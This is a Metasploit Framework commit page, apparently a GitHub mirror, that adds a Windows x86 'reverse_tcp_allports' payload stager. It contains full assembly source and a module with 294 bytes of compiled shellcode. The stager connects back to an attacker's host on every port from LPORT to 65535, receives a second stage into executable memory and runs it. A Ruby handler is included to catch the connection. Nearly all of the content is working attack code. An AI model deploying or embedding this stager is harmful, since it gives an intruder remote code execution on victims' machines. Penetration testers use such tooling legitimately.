infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adds support for the reverse_tcp_allports stager for Windows. This payload tries to connect back on all ports, one at a time, from LPORT to 65535. This is incredibly slow (depends on the default socket timeout) and requires the user to forward all TCP ports of LHOST to a single listening port in the handler. Inspired by a few user requests and this blog post: http://clinicallyawesome.com/post/196352889/blind-connect-back-through-restrictive-firewall 

git-svn-id: file:///home/svn/framework3/trunk@7058 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-09-25 05:44:50 +00:00
parent 069144f56a
commit ee9a8f4f76
4 changed files with 199 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
external/source/shellcode/windows/x86/src/block/block_reverse_tcp_allports.asm vendored Normal file
View File

@ -0,0 +1,62 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
reverse_tcp:
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
push 0x5F327377 ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this stuct
push eax ; push the wVersionRequested parameter
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call ebp ; WSAStartup( 0x0190, &WSAData );
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
push eax ; push null for reserved parameter
push eax ; we do not specify a WSAPROTOCOL_INFO structure
push eax ; we do not specify a protocol
inc eax ;
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
set_address:
push 0x0100007F ; host 127.0.0.1
push 0x5C110002 ; family AF_INET and port 1
mov esi, esp ; save pointer to sockaddr struct
try_connect:
push byte 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
call ebp ; connect( s, &sockaddr, 16 );
test eax,eax ; non-zero means a failure
jz short connected
port_bump:
xor eax, eax
mov word ax, [esi+2]
xchg ah,al
inc ax
xchg ah,al
mov word [esi+2], ax
jmp short try_connect
connected:

20
external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx_allports.asm vendored Normal file
View File

@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_tcp_allports.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
%include "./src/block/block_recv.asm"
; By now we will have recieved in the second stage into a RWX buffer and be executing it

49
lib/msf/core/handler/reverse_tcp_allports.rb Normal file
View File

@ -0,0 +1,49 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
module Msf
module Handler
###
#
# This module implements the reverse TCP handler that works with
# "allports" stagers. This handler listens on a single TCP port,
# and the operating system redirects all incoming connections
# on all ports to this listening port. This requires iptables
# or another packet filter to be used in order to work properly
#
###
module ReverseTcpAllPorts
include Msf::Handler::ReverseTcp
#
# Returns the string representation of the handler type, in this case
# 'reverse_tcp_allports'.
#
def self.handler_type
return "reverse_tcp_allports"
end
#
# Returns the connection-described general handler type, in this case
# 'reverse'.
#
def self.general_handler_type
"reverse"
end
#
# Override the default port to be '1'
#
def initialize(info = {})
super
register_options(
[
OptPort.new('LPORT', [true, 'The starting port number to connect back on', 1])
], Msf::Handler::ReverseTcpAllPorts)
end
end
end
end

68
modules/payloads/stagers/windows/reverse_tcp_allports.rb Normal file
View File

@ -0,0 +1,68 @@
##
# $Id: reverse_tcp.rb 7035 2009-09-14 08:45:01Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp_allports'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse All-Port TCP Stager',
'Version' => '$Revision: 7035 $',
'Description' => 'Try to connect back to the attacker, on all possible ports (1-65535, slowly)',
'Author' => ['hdm', 'skape', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>'],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcpAllPorts,
'Convention' => 'sockedi',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], },
'Payload' =>
# Length: 294 bytes
# Port Offset: 202
# Host Offset: 195
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x97\x68\x7F\x00\x00\x01\x68\x02\x00\x01\x00\x89\xE6\x6A\x10" +
"\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x12\x31\xC0\x66" +
"\x8B\x46\x02\x86\xE0\x66\x40\x86\xE0\x66\x89\x46\x02\xEB\xDF\x6A" +
"\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40" +
"\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93" +
"\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29" +
"\xC6\x85\xF6\x75\xEC\xC3"
}
))
end
def self.handler_type
return "reverse_tcp"
end
end